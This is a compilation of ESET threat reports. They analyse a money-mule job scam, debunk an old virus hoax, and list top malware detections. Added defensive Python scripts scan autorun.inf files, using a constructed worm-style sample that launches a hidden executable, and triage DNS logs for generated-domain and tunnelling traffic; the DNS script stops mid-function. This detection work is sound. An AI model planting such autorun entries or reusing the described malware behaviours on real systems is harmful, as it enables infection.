It’s all too common for job offers to turn out to be some form of 419 or other Advance Fee Fraud (AFF) or a poorly paid work-from-home job. However, sometimes the job offered actually involves participating in money laundering as a money mule, though oddly enough, that’s never the job title – that’s more likely to be something like ‘financial assistant’ or even ‘financial director’. Unfortunately, it’s possible for a naive victim to believe they’re working for a legitimate company and not realize that they’re breaking the law until the police come a-knocking.

These are global problems, not just an issue in Ireland, but apart from an overwhelming quantity of online banking scams hitting Irish mailboxes, ESET Ireland has in the recent months observed that the cybercriminals are also working particularly hard on exploiting the misfortune of those worst hit by the economic situation, with the same immoral cynicism they apply when promoting fake charities or fraudulent donations during natural disasters.

Official-looking emails, equipped with company logotypes and addresses, are circulating, offering everything from easy and affordable loans and offers to work from home for an online enterprise, to completing financial transactions and taking a cut for yourself. All of these are topics specifically aimed at those who have found themselves out of work and without a regular income.

Even if they sound promising enough and claim to provide the recipient with something, whether a loan, a job or a transaction fee, most of these offers will sooner or later require the victim to pay some advance fee or hand over sensitive personal data, such as bank account or credit card numbers, or they will go straight for the main prize.

How does the scam part usually work, then? The victim receives an uncovered cheque or other counterfeit proof of payment made out to themselves, while they are expected to forward on their actual funds immediately. By the time they get confirmation that they didn’t actually receive anything from the scammers and that the cheque or other proof of payment is worthless, they have already parted with their own money via the untraceable Western Union, and the scammers walk away with a hefty profit.

This is a slightly different example, though.

I would like to know if you are interested to work from home for us 

WHAT YOU NEED TO DO FOR US?

My Company needs a financial representative who will serve as our Agent  in processing any of our funds made out to us by our CANADA, EUROPE &  AMERICAN customers, Why we need you to represent us there is because  the payments Takes a long period of time to clear in our banks in UK,  and due to Frequent Request and supplies of product we do not meet  our demand due to this Failure So that why we seek your time and  assistance. 

JOB DESCRIPTION

1. Receive payment (America Cheques/EUROPE DRAFT) from Clients which will get to you through a courier service

2. Cash Payments at your Bank

3. Deduct 10% which will be your percentage/pay on Payment processed.

4. Forward balance after deduction of percentage/pay to any of the Offices you will be contacted to send payment to (Payment is to Forwarded By Western Union Money Transfer).

This looks like a money mule solicitation, the sort of ‘job offer’ by which someone out of work might be particularly vulnerable to being conned. And in fact, the victim may actually make some money out of the deal. But it’s still bad news for someone who takes up the offer, who is likely to find that sooner or later he’ll attract the attention of the police and be left holding the bag, with his bank account closed and his assets frozen, at least until it can be sorted out what proportion of those assets have been acquired through involvement in money laundering. The sad thing is that the victim may honestly believe he has a legitimate job for a legitimate company, hard though that is to understand for anyone with a modicum of healthy scepticism. Of course that doesn’t mean the scammer won’t demand some sort of advance fee in order to get a little extra profit, and in fact we see 419 versions that are probably more interested in scamming the recipient than in real money laundering.

Needless to say, the golden rule “If it sounds too good to be true, it probably is” should be applied rather vigorously to most, if not all, such emails. The only goal of the cybercriminals is to make money. Any offers they make, any promises or good deals they offer, all serve their main purpose, to get to some of your money and make it theirs.

Spam filtering should limit the number of such scams you receive, but some may also arrive through Facebook messages, chat or phone texts. In any case, use common sense if you receive them, do not reply to any of them and warn your friends to be careful too.

Top Ten Threats at a Glance (graph)

Analysis of ESET LiveGrid®, a sophisticated malware reporting and tracking system, shows that the highest number of detections this month, with almost 3.32% of the total, was scored by the INF/Autorun class of threat.

[Graph: Top 10 ESET Live Grid detections, February 2013]

1. INF/Autorun

Previous Ranking: 1
Percentage Detected: 3.32%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.

2. HTML/Iframe.B

Previous Ranking: 2
Percentage Detected: 2.99%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location hosting malicious software.

3. Win32/Sality

Previous Ranking: 5
Percentage Detected: 2.17%

Sality is a polymorphic file infector. When run, it starts a service and creates or deletes registry keys related to security activities on the system, and ensures that the malicious process starts on each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

4. HTML/ScrInject.B

Previous Ranking: 3
Percentage Detected: 1.96%

Generic detection of HTML web pages containing obfuscated scripts or iframe tags that automatically redirect to the malware download.

5. Win32/Dorkbot

Previous Ranking: 8
Percentage Detected: 1.81%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

6. Win32/Ramnit

Previous Ranking: 7
Percentage Detected: 1.74%

It is a file infector: a virus that executes on every system start. It infects DLL and EXE files and also searches for HTM and HTML files to write malicious instructions into them. It exploits a vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down/restart the computer.

7. Win32/Conficker

Previous Ranking: 6
Percentage Detected: 1.39%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.

8. Win32/Qhost

Previous Ranking: 4
Percentage Detected: 1.31%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

9. JS/TrojanDownloader.Iframe.NKE

Previous Ranking: 9
Percentage Detected: 0.84%

It is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

10. Win32/Virut

Previous Ranking: 32
Percentage Detected: 0.79%

Win32/Virut is a polymorphic file infector. It affects files with EXE and SCR extensions by appending the threat itself to the last section of the file. Additionally, it searches for HTM, PHP and ASP files and adds a malicious iframe to them. The virus connects to an IRC network and can be controlled remotely.

Monthly Threat Report: January 2013

Fact, Fiction, and Old-Time Movies

David Harley CITP FBCS CISSP, ESET Senior Research Fellow

In a world where nothing seems to be constant but change, it’s good to know that there are, in fact, some things that change fairly slowly. Unfortunately, readiness to believe and spread hoaxes is one of them. Even worse, they’re often the same hoaxes that were being spread years and even decades ago. Here’s a hoax message – actually two hoaxes shoehorned into the same message – that was passed on to me this month. It goes back well over a decade: my wife (who received it from a well-meaning friend) and I are both pretty sure we saw hoaxes very much like this in the 1990s. While this version was received by email, the same or similar hoaxes are also spread via social media, especially Facebook. By the way, I’ve cleaned up the hoax text just a little, mostly to remove a plethora of redundant space characters.

URGENT – PLEASE READ – NOT A JOKE

Well, it’s certainly not funny. (Even less so if your name happens to be Simon Ashton.) Perhaps the number of hoaxes passed on with assurances that “this is not a joke” or “this is real” does at least indicate that people are a little more sceptical than they used to be.

IF A PERSON CALLED SIMON ASHTON (SIMON25@HOTMAIL.CO.UK) CONTACTS YOU THROUGH EMAIL DON’T OPEN THE MESSAGE. DELETE IT  BECAUSE HE IS A HACKER!!

In fact, this message has been spread using a variety of names for the ‘hacker’ over the years: recent versions name, for example, Christopher Butterfield, Tanner Dwyer, Stefania Colac or Alejando Spiljner. Often, it’s claimed that the alleged hacker will contact you with a friend request, which gives it an extra air of authority when spread by Facebook. In those instances, however, you’re less likely to encounter the next paragraph, which is email-specific, in a muddled and seriously unconvincing sort of way.

TELL EVERYONE ON YOUR  LIST   BECAUSE IF SOMEBODY ON YOUR LIST ADDS  HIM  THEN YOU WILL GET HIM ON YOUR LIST. HE WILL FIGURE  OUT YOUR ID COMPUTER ADDRESS, SO COPY AND PASTE THIS MESSAGE  TO EVERYONE EVEN IF YOU DON’T CARE FOR THEM AND FAST BECAUSE  IF HE HACKS THEIR EMAIL HE HACKS YOUR MAIL TOO!!!!!……

And at this point we get an abrupt change of topic, though it isn’t flagged as such. Still, the fact that the message suddenly stops being all capitals is a bit of a giveaway. Excessive capitalization, by the way, is often a feature of hoax messages, no doubt in order to impress upon us how SERIOUS AND TRUE the message is.

Anyone-using Internet mail such as Yahoo, Hotmail, AOL and so on..   This information arrived this morning, Direct from both Microsoft and Norton. Please send it to everybody you know who has access to the Internet. You may receive an apparently harmless e-mail titled  ‘Mail Server Report’

Where to start on debunking this? Well, the fact that this targets everyone who uses Internet email and everyone who has Internet access should tell you something about the sender’s motivation, and I don’t mean sheer altruism.

Back when I first saw this message (or something very close), the idea that a message from Microsoft was likely to be an authoritative indicator of importance in terms of security was less convincing, but since then Microsoft has become both more security-conscious and a security vendor in its own right, so I guess that bit has actually gained (spurious) authority.

The assertion that ‘This information arrived this morning’ is something of a giveaway in itself. Hoaxes are notoriously vague about exact dates and, in fact, any information that might help you locate authentic information (corroborative or otherwise). The weakness of this approach is that if the recipient actually notices that the message has been forwarded many times to many people, he might actually start thinking about which morning that might have been, and look for more information. However, the impressive list of previous recipients on this particular email strongly suggests that plenty of people don’t take that extra conceptual step.

This hoax is a variation on the ‘Life is beautiful’ hoax, which claimed that the message would include a malicious file masquerading as a Powerpoint presentation called Life is beautiful.pps. As it happens, there was a possibility long ago that a malicious file would arrive with a specific and identifiable filename. Well, I suppose it’s still possible, but the authors of real malware learned long ago that there are all too many ways to vary the name of a malicious file spammed out with email, so it’s not very likely. In this case, though, the hoax somehow got tangled up with real (but long gone) variants of the Win32/Warezov mass-mailer that arrived in an email claiming to be a ‘Mail Server Report’.  Sometimes, though not in this case, the hoax picks up an additional ‘verified by Snopes’ message, based on the fact that Snopes – a well-known reference source for information on hoaxes, urban legends and such – listed the real Warezov malware as true.

If you open either file, a message will appear on your screen saying:  ‘It is too late now, your life is no  longer  beautiful.’

Obviously a hangover from the Life is beautiful version.

Subsequently you will LOSE EVERYTHING IN YOUR PC,
And the person who o  sent it to you will gain access to your  name, e-mail and  password.

The usual drivel. Well, some or all of this might happen to you as a result of malware, but not the fictitious malware described in the message.

This is a new virus which started to circulate on Saturday afternoon.. AOL has already confirmed the severity, and the anti virus software’s are not capable of destroying it ..

Gosh. This must be some serious virus. Not only has it turned Saturday into the day before Friday (or perhaps it was circulating for a week before anyone noticed their system had been trashed), but AV is incapable of defeating it. I know that the likes of Imperva are still constantly claiming we can’t detect malware, but even they don’t usually go so far as to claim that we can’t remove malware we know about. And I’m not sure how anyone can know so much about the timeline of a virus that destroys every system it touches.

AOL? Well, I guess that’s an indication of how old the hoax is, going back to the days when the newsagents were perpetually tripping over AOL diskettes and CDs that had fallen off computer magazines, and hoaxes were constantly citing AOL and Microsoft in order to make themselves seem more ‘authentic’ and scary.

The virus has been created by a hacker who calls himself  ‘life  owner’..

Complete with extra period character to give it more weight. Or at any rate, so as to make the line a little longer. This line is another hangover from ‘Life is beautiful’.

Hark! There’s the tinkling sound of another angel getting his wings! Oh, sorry: I’m just getting confused between fiction and Frank Capra movies.

Virus Bulletin 2012 – two souvenirs

2012’s Virus Bulletin conference in Dallas was pretty successful for ESET: you could barely move for ESET researchers on their way to or from their own presentations. A couple more ESET papers have now been put up on the conference papers page. Both papers were first published in the Virus Bulletin 2012 Conference proceedings, and are available here by kind permission of Virus Bulletin, which holds the copyright.

BYOD: (B)rought (Y)our (O)wn (D)estruction?
By Righard Zwienenberg

Nowadays all employees bring their own Internet-aware devices to work. Employers and institutions such as schools think they can save a lot of money by having their employees or students use their own kit. But is that true, or are they over-influenced by financial considerations?

There are many pros and cons with the BYOD trend. The sheer range of different devices that might need to be supported can cause problems, not all of them obvious. This paper will list the pros and cons, including those for Internet-aware devices that people do not think of as dangerous or even potentially dangerous.

These devices are often ‘powered’ by applications downloaded from some kind of App-Store/Market. The applications there should be safe, but are they? What kind of risks do they pose for personal or corporate data? Furthermore, the paper will describe different vectors of attack towards corporate networks and the risk of intractable data leakage problems: for example, encryption of company data on portable devices is by no means common practice. Finally, we offer advice on how to handle BYOD policies in your own environment and if it is really worth it. Maybe ‘Windows To Go’ – a feature of Windows 8 that boots a PC from a Live USB stick which contains Win8, applications plus Group Policies applied by the admin – is a suitable base model for converting BYOD into a Managed By IT Device.

Remember: BYOD isn’t coming, it is here already and it is (B)ig, (Y)et (O)utside (D)efence perimeters!

Dorkbot: Hunting Zombies in Latin America
By Pablo Ramos

Win32/Dorkbot appeared at the beginning of 2011, and in just a couple of months the volume of Dorkbot detections increased until it became the malware with the most impact in Latin America over the whole year. This threat uses removable media and social networks as its means of spreading and achieved the highest position in threat ranking statistics in only three months. Ngrbot (as its author prefers to call it, or Win32/Dorkbot as the AV industry prefers) stands out as the favourite crime pack for Latin America’s cybercriminals and it is widely disseminated through a wide variety of media and vectors.

Lots of small botnets have been detected and are being used for information theft, such as personal data and home banking credentials taken from compromised computers. Spreading through .LNK files on removable media, through customized messages on social networks like Facebook, and through local news items or compromised web pages, the malware converts systems into bots controlled through the IRC protocol.

In this paper the main capabilities and features of Win32/Dorkbot are introduced, and we show its evolution into different versions, starting with AUTORUN spreading, and moving on to the use of LNK files and information-stealing techniques. Win32/Dorkbot.B is the most widely spread variant of this worm, its constructor having been leaked and made available on the web. We tracked down one of the active botnets in the region and reviewed the main activities performed by the cybercriminals.

The investigation came up with thousands of bot computers reporting to the bot master, who used several servers and vulnerable web pages for the implementation of phishing attacks and propagation of threats.

Social media messages have been used to spread copies of this malware through Facebook and Windows Live Messenger. Some of the topics used for spreading included presidents, celebrities and accidents all over the continent and the rest of the world. Also, email accounts are being stolen/hijacked by this malware.

We also comment on why and in what ways Win32/Dorkbot’s activity in Latin America differs from the rest of the world, including trends that involve Internet usage, social media and user education. These combinations are a direct cause of the massive infection rates detected in the region. The main features, including botnet control, bot commands and protocols are described in this paper.

The Top Ten Threats

Analysis of ESET Live Grid, a sophisticated malware reporting and tracking system, shows that the highest number of detections this month, with almost 3.27% of the total, was scored by the INF/Autorun class of threat.

[Graph: Top 10 ESET Live Grid detections, January 2013]

1. INF/Autorun

Previous Ranking: 1
Percentage Detected: 3.27%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.

2. HTML/Iframe.B

Previous Ranking: 3
Percentage Detected: 2.77%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location hosting malicious software.

3. HTML/ScrInject.B

Previous Ranking: NA
Percentage Detected: 2.66%

Generic detection of HTML web pages containing obfuscated scripts or iframe tags that automatically redirect to the malware download.

4. Win32/Qhost

Previous Ranking: 4
Percentage Detected: 2.13%

This threat copies itself to the %system32% folder of Windows before starting. It then communicates over DNS with its command and control server. Win32/Qhost can spread through e-mail and gives control of an infected computer to an attacker.

5. Win32/Sality

Previous Ranking: 12
Percentage Detected: 1.61%

Sality is a polymorphic file infector. When run, it starts a service and creates or deletes registry keys related to security activities on the system, and ensures that the malicious process starts on each reboot of the operating system.
It modifies EXE and SCR files and disables services and processes related to security solutions.
More information relating to a specific signature:
http://www.eset.eu/encyclopaedia/sality_nar_virus__sality_aa_sality_am_sality_ah

6. Win32/Conficker

Previous Ranking: 2
Percentage Detected: 3.40%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.

7. Win32/Ramnit

Previous Ranking: 7
Percentage Detected: 1.17%

It is a file infector: a virus that executes on every system start. It infects DLL and EXE files and also searches for HTM and HTML files to write malicious instructions into them. It exploits a vulnerability on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remotely to capture screenshots, send gathered information, download files from a remote computer and/or the Internet, run executable files, or shut down/restart the computer.

8. Win32/Dorkbot

Previous Ranking: 5
Percentage Detected: 1.15%

Win32/Dorkbot.A is a worm that spreads via removable media. The worm contains a backdoor and can be controlled remotely. The file is run-time compressed using UPX.
The worm collects login user names and passwords when the user browses certain web sites, then attempts to send the gathered information to a remote machine.

9. JS/TrojanDownloader.Iframe.NKE

Previous Ranking: 6
Percentage Detected: 1.08%

It is a trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

10. Win32/Sirefef

Previous Ranking: 9
Percentage Detected: 0.76%

Win32/Sirefef.A is a trojan that redirects results of online search engines to web sites that contain adware.

Monthly Threat Report: December 2012

Top Ten Threats at a Glance (graph)

Analysis of ESET Live Grid, a sophisticated malware reporting and tracking system, shows that the highest number of detections this year, with almost 5.17% of the total, was scored by the INF/Autorun class of threat.

[Graph: Top 10 ESET Live Grid detections, 2012 annual]

The Top Ten Threats of 2012

1. INF/Autorun

Percentage Detected: 5.17%

This detection label is used to describe a variety of malware using the file autorun.inf as a way of compromising a PC. This file contains information on programs meant to run automatically when removable media (often USB flash drives and similar devices) are accessed by a Windows PC user. ESET security software heuristically identifies malware that installs or modifies autorun.inf files as INF/Autorun unless it is identified as a member of a specific malware family.

Removable devices are useful and very popular: of course, malware authors are well aware of this, as INF/Autorun’s frequent return to the number one spot clearly indicates. Here’s why it’s a problem.

The default Autorun setting in Windows will automatically run a program listed in the autorun.inf file when you access many kinds of removable media. There are many types of malware that copy themselves to removable storage devices: while this isn’t always the program’s primary distribution mechanism, malware authors are always ready to build in a little extra “value” by including an additional infection technique.

While using this mechanism can make it easy to spot for a scanner that uses this heuristic, it’s better, as Randy Abrams has suggested in our blog (http://www.eset.com/threat-center/blog/?p=94; http://www.eset.com/threat-center/blog/?p=828) to disable the Autorun function by default, rather than to rely on antivirus to detect it in every case. You may find Randy’s blog at http://www.eset.com/threat-center/blog/2009/08/25/now-you-can-fix-autorun useful, too.
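The Autorun mechanism just described (this INF/Autorun write-up recurs in each of the top-ten lists above) is easy to check for from the defender's side. The following script is an added example, not ESET's or Microsoft's code: it parses an autorun.inf file and lists the entries that would make Windows run a program from the medium, and it decodes the NoDriveTypeAutoRun registry policy value, which is the documented way to disable Autorun per drive type. The sample autorun.inf files, the path `hidden\update.exe` and the function names are constructed for the example; the registry key, value name and bit meanings are the standard Windows ones.

```python
"""Added example (not ESET's or Microsoft's code): a defender-side check for the
Autorun mechanism described under INF/Autorun.  It parses an autorun.inf file
and reports the entries that make Windows launch a program from the medium,
and decodes the NoDriveTypeAutoRun policy value that controls whether Autorun
is disabled per drive type.  The sample autorun.inf files are constructed."""
import re
from typing import Dict, List, Optional

# [autorun] keys that cause code to run (documented autorun.inf semantics).
# icon=, label= and action= only change how the drive is presented.
LAUNCH_KEYS = {"open", "shellexecute"}
SHELL_COMMAND = re.compile(r"^shell\\[^\\]+\\command$")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the [autorun] section as a lower-cased key -> value mapping.
    Deliberately tolerant: Windows ignores lines it cannot parse, and malicious
    files sometimes pad the section with junk to trip up naive scanners."""
    entries: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_entries(entries: Dict[str, str]) -> List[str]:
    """Entries that would execute something, as 'key=value'.  open= and
    shellexecute= run on insertion when Autorun is enabled; a
    shell\\<verb>\\command= entry runs when that verb is chosen from the
    context menu, or on double-click if shell= makes it the default verb."""
    return sorted(f"{k}={v}" for k, v in entries.items()
                  if k in LAUNCH_KEYS or SHELL_COMMAND.match(k))


def assess(text: str, removable: bool = True) -> List[str]:
    """Reasons an autorun.inf deserves a closer look.  On a USB data drive any
    launch entry is suspect; on a pressed install CD a single open=setup.exe is
    normal, so only the social-engineering trick is reported there."""
    entries = parse_autorun(text)
    launches = launch_entries(entries)
    reasons: List[str] = []
    if launches and removable:
        reasons.append("runs a program from the medium: " + "; ".join(launches))
    if launches and "open folder" in entries.get("action", "").lower():
        reasons.append("AutoPlay entry imitates the built-in 'Open folder to view files' choice")
    return reasons


# NoDriveTypeAutoRun (REG_DWORD) under
# HKLM or HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.
# Each set bit DISABLES Autorun for that drive type; 0xFF disables it for all.
DRIVE_TYPE_BITS = {0x04: "removable", 0x08: "fixed", 0x10: "network",
                   0x20: "CD/DVD", 0x40: "RAM disk", 0x80: "unknown"}


def autorun_enabled_for(policy_value: int) -> List[str]:
    """Drive types on which Autorun remains enabled under the given value."""
    return [name for bit, name in DRIVE_TYPE_BITS.items() if not policy_value & bit]


def read_policy_value() -> Optional[int]:
    """Read the machine-wide value on Windows; None if not on Windows or the
    value is absent (then the OS default applies and Autorun is not fully off)."""
    try:
        import winreg  # Windows only
    except ImportError:
        return None
    path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
            value, _ = winreg.QueryValueEx(key, "NoDriveTypeAutoRun")
            return int(value)
    except OSError:
        return None


# Constructed: the shape of autorun.inf a removable-media worm typically drops.
WORM_INF = """[AutoRun]
; junk line that Windows ignores
!@#$
open=hidden\\update.exe
shell\\open\\command=hidden\\update.exe
shell\\explore\\command=hidden\\update.exe
action=Open folder to view files
"""

# Constructed: a typical install CD.
INSTALL_CD_INF = """[autorun]
open=setup.exe
icon=setup.exe,0
label=Product Installer
"""

if __name__ == "__main__":
    print("USB stick:", assess(WORM_INF))
    print("install CD:", assess(INSTALL_CD_INF, removable=False))
    value = read_policy_value()
    print("policy:", hex(value) if value is not None else "not set",
          "still enabled for:", autorun_enabled_for(value or 0))
```

The `removable` flag is the caveat that matters in practice: the same `open=setup.exe` line is routine on an install CD and a red flag on a data stick. A policy value of 0xFF is what "disable Autorun" amounts to; anything less leaves some drive type open.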

2. HTML/ScrInject.B

Percentage Detected: 4.44%

Generic detection of HTML web pages containing obfuscated scripts or iframe tags that automatically redirect to the malware download.

3. HTML/Iframe.B

Percentage Detected: 3.51%

Type of infiltration: Virus
HTML/Iframe.B is a generic detection of malicious IFRAME tags embedded in HTML pages, which redirect the browser to a specific URL location hosting malicious software.

4. Win32/Conficker

Percentage Detected: 3.00%

The Win32/Conficker threat is a network worm originally propagated by exploiting a recent vulnerability in the Windows operating system. This vulnerability is present in the RPC sub-system and can be remotely exploited by an attacker without valid user credentials. Depending on the variant, it may also spread via unsecured shared folders and by removable media, making use of the Autorun facility enabled at present by default in Windows (though not in Windows 7).

Win32/Conficker loads a DLL through the svchost process. This threat contacts web servers with pre-computed domain names to download additional malicious components. Fuller descriptions of Conficker variants are available at http://www.eset.eu/buxus/generate_page.php?page_id=279&lng=en.

While ESET has effective detection for Conficker, it’s important for end users to ensure that their systems are updated with the Microsoft patch, which has been available since the third quarter of 2008, so as to avoid other threats using the same vulnerability. Information on the vulnerability itself is available at http://www.microsoft.com/technet/security/Bulletin/ms08-067.mspx. While later variants dropped the code for infecting via Autorun, it can’t hurt to disable it: this will reduce the impact of the many threats we detect as INF/Autorun. The Research team in San Diego has blogged extensively on Conficker issues: http://www.eset.com/threat-center/blog/?cat=145

It’s important to note that it’s possible to avoid most Conficker infection risks generically, by practicing “safe hex”: keep up-to-date with system patches, disable Autorun, and don’t use unsecured shared folders. In view of all the publicity Conficker has received and its extensive use of a vulnerability that’s been remediable for so many months, we’d expect Conficker infections to be in decline by now if people were taking these commonsense precautions. While the current ranking looks like a drop in Conficker prevalence, this figure is affected by the changes in naming and statistical measurement mentioned earlier: there’s no indication of a significant drop in Conficker infections covering all variants.
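Two behaviours named in this report show up in resolver logs: Conficker's lookups of pre-computed domain names (here and in the other months' Conficker entries) and Qhost's command-and-control traffic over DNS. As an added example, not ESET's code, the script below parses a constructed log format, flags clients that produce a burst of NXDOMAIN answers for random-looking domains (a pre-computed list is mostly unregistered on any given day, so the names fail to resolve), and flags clients that send many distinct, long subdomain labels to one parent domain (data riding in the query names). The log lines, host names, thresholds and function names are all constructed; `looks_generated()` is a coarse heuristic for illustration, not a Conficker domain generator.

```python
"""Added example (not ESET's code): a heuristic triage pass over DNS query logs
for two behaviours this report mentions, Conficker's lookups of pre-computed
(algorithmically generated) domain names and Qhost-style command-and-control
traffic carried over DNS.  The log format and every line below are
constructed for the example; real resolvers log differently."""
import hashlib
import math
import re
from collections import Counter, defaultdict
from typing import Dict, List

# Constructed format: "<timestamp> <client> query <qtype> <qname> <rcode>"
LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qtype>\S+)\s+(?P<qname>\S+)\s+(?P<rcode>\S+)$")


def parse_log(text: str) -> List[Dict[str, str]]:
    """Parse the constructed log format; unparseable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def shannon_entropy(s: str) -> float:
    """Bits per character of s; hex- or base32-encoded payloads score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def labels(qname: str) -> List[str]:
    return qname.rstrip(".").lower().split(".")


def looks_generated(label: str) -> bool:
    """Random-looking second-level label: few vowels and a long consonant run.
    Coarse on purpose; it is only acted on together with NXDOMAIN answers."""
    if len(label) < 6:
        return False
    vowels = sum(ch in "aeiou" for ch in label)
    longest_run = run = 0
    for ch in label:
        run = 0 if ch in "aeiou" else run + 1
        longest_run = max(longest_run, run)
    return vowels / len(label) < 0.3 and longest_run >= 4


def dga_suspects(rows: List[Dict[str, str]], min_nxdomain: int = 5) -> Dict[str, int]:
    """Clients that resolved at least min_nxdomain random-looking names that did
    not exist.  The burst is the signal, not any single name."""
    counts: Counter = Counter()
    for r in rows:
        parts = labels(r["qname"])
        if r["rcode"] == "NXDOMAIN" and len(parts) >= 2 and looks_generated(parts[-2]):
            counts[r["client"]] += 1
    return {c: n for c, n in counts.items() if n >= min_nxdomain}


def dns_c2_suspects(rows: List[Dict[str, str]], min_distinct: int = 3,
                    min_label_len: int = 30) -> Dict[str, Dict[str, float]]:
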